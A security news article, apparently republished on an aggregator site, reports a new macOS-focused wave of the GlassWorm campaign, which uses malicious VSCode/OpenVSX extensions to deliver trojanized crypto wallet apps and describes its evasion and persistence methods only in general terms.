Cybersecurity

New Glassworm Malware Wave Targets Macs With Trojanized Crypto Wallets

2026-01-01 0 views admin
New Glassworm Malware Wave Targets Macs With Trojanized Crypto Wallets

A fourth wave of the "GlassWorm" campaign is targeting macOS developers with malicious VSCode/OpenVSX extensions that deliver trojanized versions of crypto wallet applications.

Extensions in the OpenVSX registry and the Microsoft Visual Studio Marketplace expand the capabilities of a VS Code-compatible editor by adding features and productivity enhancements in the form of development tools, language support, or themes.

The Microsoft marketplace is the official extension store for Visual Studio Code, whereas OpenVSX serves as an open, vendor-neutral alternative, primarily used by editors that do not support or choose not to rely on Microsoft's proprietary marketplace.

The GlassWorm malware first appeared on the marketplaces in October, hidden inside malicious extensions using "invisible" Unicode characters.

Once installed, the malware attempted to steal credentials for GitHub, npm, and OpenVSX accounts, as well as cryptocurrency wallet data from multiple extensions. Additionally, it supported remote access through VNC and can route traffic through the victim's machine via a SOCKS proxy.

Despite the public exposure and increased defenses, GlassWorm returned in early November on OpenVSX and then again in early December on VSCode.

Koi Security researchers discovered a new GlassWorm campaign that targets macOS systems exclusively, a departure from the previous ones that focused only on Windows.

Instead of the invisible Unicode seen in the first two waves, or compiled Rust binaries used in the third one, the most recent GlassWorm attacks use an AES-256-CBC–encrypted payload embedded in compiled JavaScript in the OpenVSX extensions:

The malicious logic executes after a 15-minute delay, likely in an attempt to evade analysis in sandboxed environments.

Instead of PowerShell, it now uses AppleScript, and instead of Registry modification, it uses LaunchAgents for persistence. The Solana blockchain-based command-and-control (C2) mechanism remains unchanged, though, and researchers say that there is also infrastructure overlap.

Source: BleepingComputer

🏷️ Tags

securitymalwareattack

More from Cybersecurity

Openai Is Offering $20 Chatgpt Plus For Free To Some Users 2026

Openai Is Offering $20 Chatgpt Plus For Free To Some Users 2026

2026-01-01 0
Security Biggest Cybersecurity And Cyberattack Stories Of 2025

Security Biggest Cybersecurity And Cyberattack Stories Of 2025

2026-01-01 0
New Biggest Cybersecurity And Cyberattack Stories Of 2025 2026

New Biggest Cybersecurity And Cyberattack Stories Of 2025 2026

2026-01-01 0
Rondodox Botnet Exploits Critical React2shell Flaw To Hijack Iot...

Rondodox Botnet Exploits Critical React2shell Flaw To Hijack Iot...

2026-01-01 0

Trending

1

CVE-2025-61481: Critical Remote Code Execution Vulnerability in MikroTik RouterOS & SwitchOS

2025-10-27 • 189 views
2

CVE-2025-43939: Dell Unity OS Command Injection (High)

2025-10-30 • 148 views
3

Google disputes false claims of massive Gmail data breach

2025-10-30 • 130 views
4

Microsoft: DNS outage impacts Azure and Microsoft 365 services

2025-10-30 • 88 views
5

3.5B Accounts, 1 Critical Flaw: Meta Closes WhatsApp Data-Harvesting

2025-11-25 • 81 views